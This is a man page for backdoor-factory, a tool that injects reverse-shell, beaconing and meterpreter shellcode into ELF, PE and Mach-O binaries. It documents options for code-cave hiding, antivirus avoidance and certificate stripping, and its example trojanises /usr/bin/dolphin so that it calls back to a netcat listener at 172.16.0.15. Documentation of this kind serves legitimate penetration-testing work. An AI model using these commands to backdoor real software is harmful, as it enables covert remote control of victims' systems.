.TH "BACKDOOR-FACTORY" "1" " Backdoor-Factory Man Page" "Philippe Thierry" "May 2017" .nh .ad l .SH NAME .PP backdoor\-factory \- inject predefined or user\-defined shellcode in binaries .SH SYNOPSIS .PP \fBbackdoor\-factory [options]\fP .SH DESCRIPTION .PP \fBbackdoor\-factory\fP patch executable binaries with user desired shellcode and continue normal execution of the prepatched state. .PP This tool is for security professionals and researchers only. .PP This tool doesn't support relocatable ELF executable (i.e. compiled with the \-fPIE option, suggested by the Debian hardening requirements, see \fB\fChttps://wiki.debian.org/Hardening\fR) .PP Binaries such as ssh may not be caved correctly, as binaries such as dolphin (at the time of this man page is written) are. .SH OPTIONS: .PP \fB\-h\fP, \fB\-\-help\fP show this help message and exit .PP \fB\-f FILE\fP, \fB\-\-file=FILE\fP File to backdoor .PP \fB\-s SHELL\fP, \fB\-\-shell=SHELL\fP Payloads that are available for use. Use 'show' to see payloads. .PP \fB\-H HOST\fP, \fB\-\-hostip=HOST\fP IP of the C2 for reverse connections. .PP \fB\-P PORT\fP, \fB\-\-port=PORT\fP The port to either connect back to for reverse shells or to listen on for bind shells .PP \fB\-J\fP, \fB\-\-cave\_jumping\fP Select this options if you want to use code cave jumping to further hide your shellcode in the binary. .PP \fB\-a\fP, \fB\-\-add\_new\_section\fP Mandating that a new section be added to the exe (better success) but less av avoidance .PP \fB\-U SUPPLIED\_SHELLCODE\fP, \fB\-\-user\_shellcode=SUPPLIED\_SHELLCODE\fP User supplied shellcode, make sure that it matches the architecture that you are targeting. .PP \fB\-c\fP, \fB\-\-cave\fP The cave flag will find code caves that can be used for stashing shellcode. This will print to all the code caves of a specific size.The \-l flag can be use with this setting. .PP \fB\-l SHELL\_LEN\fP, \fB\-\-shell\_length=SHELL\_LEN\fP For use with \-c to help find code caves of different sizes .PP \fB\-o OUTPUT\fP, \fB\-\-output\-file=OUTPUT\fP The backdoor output file path. Parent dir(s) must exist .PP \fB\-n NSECTION\fP, \fB\-\-section=NSECTION\fP New section name must be less than seven characters .PP \fB\-d DIR\fP, \fB\-\-directory=DIR\fP This is the location of the files that you want to backdoor. You can make a directory of file backdooring faster by forcing the attaching of a codecave to the exe by using the \-a setting. .PP \fB\-w\fP, \fB\-\-change\_access\fP This flag changes the section that houses the codecave to RWE. Sometimes this is necessary. Enabled by default. If disabled, the backdoor may fail. .PP \fB\-i\fP, \fB\-\-injector\fP This command turns the backdoor factory in a hunt and shellcode inject type of mechanism. Edit the target settings in the injector module. .PP \fB\-u SUFFIX\fP, \fB\-\-suffix=SUFFIX\fP For use with injector, places a suffix on the original file for easy recovery .PP \fB\-D\fP, \fB\-\-delete\_original\fP For use with injector module. This command deletes the original file. Not for use in production systems. (Author not responsible for stupid uses.) .PP \fB\-O DISK\_OFFSET\fP, \fB\-\-disk\_offset=DISK\_OFFSET\fP Starting point on disk offset, in bytes. Some authors want to obfuscate their on disk offset to avoid reverse engineering, if you find one of those files use this flag, after you find the offset. .PP \fB\-S\fP, \fB\-\-support\_check\fP To determine if the file is supported by BDF prior to backdooring the file. For use by itself or with verbose. This check happens automatically if the backdooring is attempted. .PP \fB\-M\fP, \fB\-\-cave\-miner\fP Future use, to help determine smallest shellcode possible in a PE file .PP \fB\-q\fP, \fB\-\-no\_banner\fP Kills the banner. .PP \fB\-v\fP, \fB\-\-verbose\fP For debug information output. .PP \fB\-T IMAGE\_TYPE\fP, \fB\-\-image\-type=IMAGE\_TYPE\fP ALL, x86, or x64 type binaries only. Default=ALL .PP \fB\-Z\fP, \fB\-\-zero\_cert\fP Allows for the overwriting of the pointer to the PE certificate table effectively removing the certificate from the binary for all intents and purposes. .PP \fB\-R\fP, \fB\-\-runas\_admin\fP EXPERIMENTAL Checks the PE binaries for 'requestedExecutionLevel level="highestAvailable"'. If this string is included in the binary, it must run as system/admin. If not in Support Check mode it will attmept to patch highestAvailable into the manifest if requestedExecutionLevel entry exists. .PP \fB\-L\fP, \fB\-\-patch\_dll\fP Use this setting if you DON'T want to patch DLLs. Patches by default. .PP \fB\-F FAT\_PRIORITY\fP, \fB\-\-fat\_priority=FAT\_PRIORITY\fP For MACH\-O format. If fat file, focus on which arch to patch. Default is x64. To force x86 use \-F x86, to force both archs use \-F ALL. .PP \fB\-B BEACON\fP, \fB\-\-beacon=BEACON\fP For payloads that have the ability to beacon out, set the time in secs .PP \fB\-m PATCH\_METHOD\fP, \fB\-\-patch\-method=PATCH\_METHOD\fP Patching methods for PE files, 'manual','automatic', replace and onionduke .PP \fB\-b SUPPLIED\_BINARY\fP, \fB\-\-user\_malware=SUPPLIED\_BINARY\fP For onionduke. Provide your desired binary. .PP \fB\-X\fP, \fB\-\-xp\_mode\fP Default: DO NOT support for XP legacy machines, use \-X to support XP. By default the binary will crash on XP machines (e.g. sandboxes) .PP \fB\-A\fP, \fB\-\-idt\_in\_cave\fP EXPERIMENTAL By default a new Import Directory Table is created in a new section, by calling this flag it will be put in a code cave. This can cause bianry failure is some cases. Test on target binaries first. .PP \fB\-C\fP, \fB\-\-code\_sign\fP For those with codesigning certs wishing to sign PE binaries only. Name your signing key and private key signingcert.cer and signingPrivateKey.pem respectively in the certs directory it's up to you to obtain signing certs. .PP \fB\-p\fP, \fB\-\-preprocess\fP To execute preprocessing scripts in the preprocess directory .SH ABOUT THE SHELLCODES .PP There is various predefined shellcode in backdoor\-factory. Their availability depends on the target type (ELF32, ELF64, PE32...). The shellcodes list is defined below. .SH for all intel\-based (x86 and x86\_64 architecture) .PP \fBreverse\_shell\_tcp\fP need: a remote host and port to be set permits: remote shell access .PP \fBdelay\_reverse\_shell\_tcp\fP need: a remote host and port to be set permits: remote shell access .PP \fBbeaconing\_reverse\_shell\_tcp\fP need: a beacon, a remote host and port to be set permits: remote shell access .PP \fBuser\_supplied\_shellcode\fP need: a user\-defined shellcode ready to inject permits: depend on the shellcode .SH Linux specific shellcodes .PP \fBreverse\_tcp\_stager\fP need: permits: .SH Windows PE32 exe shellcodes .PP \fBreverse\_shell\_tcp\_inline\fP needs: a remote host and port to be set permits: remote shell access .PP \fBreverse\_shell\_tcp\_stager\_threaded\fP needs: a remote host and port to be set permits: Inject the meterpreter server DLL via the Reflective Dll Injection payload .PP \fBmeterpreter\_reverse\_https\_threaded\fP needs: a remote host and port to be set permits: meterpreter over https transport .PP \fBuser\_applied\_shellcode\_threaded\fP needs: a user\-defined shellcode ready to inject permits: depend on the shellcode .PP \fBiat\_reverse\_tcp\_inline\fP needs: a remote host and port to be set permits: .PP \fBiat\_reverse\_tcp\_inline\_threaded\fP needs: a remote host and port to be set permits: .PP \fBiat\_reverse\_tcp\_stager\_threaded\fP needs: a remote host and port to be set permits: Inject the meterpreter server DLL via the Reflective Dll Injection payload .PP \fBiat\_user\_applied\_shellcode\_threaded\fP needs: a user\-defined shellcode ready to inject permits: depend on the shellcode .SH Windows PE64 exe shellcodes .PP \fBdelay\_reverse\_shell\_tcp\fP needs: a remote host and port to be set permits: remote shell access .PP \fBreverse\_shell\_tcp\fP needs: a remote host and port to be set permits: remote shell access .PP \fBbeaconing\_reverse\_shell\_tcp\fP needs:a beacon, a remote host and port to be set permits: remote shell access .PP \fBuser\_supplied\_shellcode\fP needs: a user\-defined shellcode ready to inject permits: depend on the shellcode .SH EXAMPLES .PP Example of cavecoding an ELF binary, by integrating a remote shell access through a remote TCP listener (e.g. netcat): .PP \fB\fCbackdoor\-factory \-f /usr/bin/dolphin \-H 172.16.0.15 \-P 8080 \-s reverse\_shell\_tcp\fR .PP On the host behind the IP 172.16.0.15, start netcat in listen mode: .PP \fB\fC$ netcat \-l 172.16.0.15 8080\fR .PP On the target, start the backdoored binary: \fB\fC\&./backdoored/dolphin\fR .PP Now, on the host 172.16.0.15, just use your shell. .SH HISTORY .PP May 2017, Originally compiled by Philippe Thierry (phil at reseau\-libre dot com)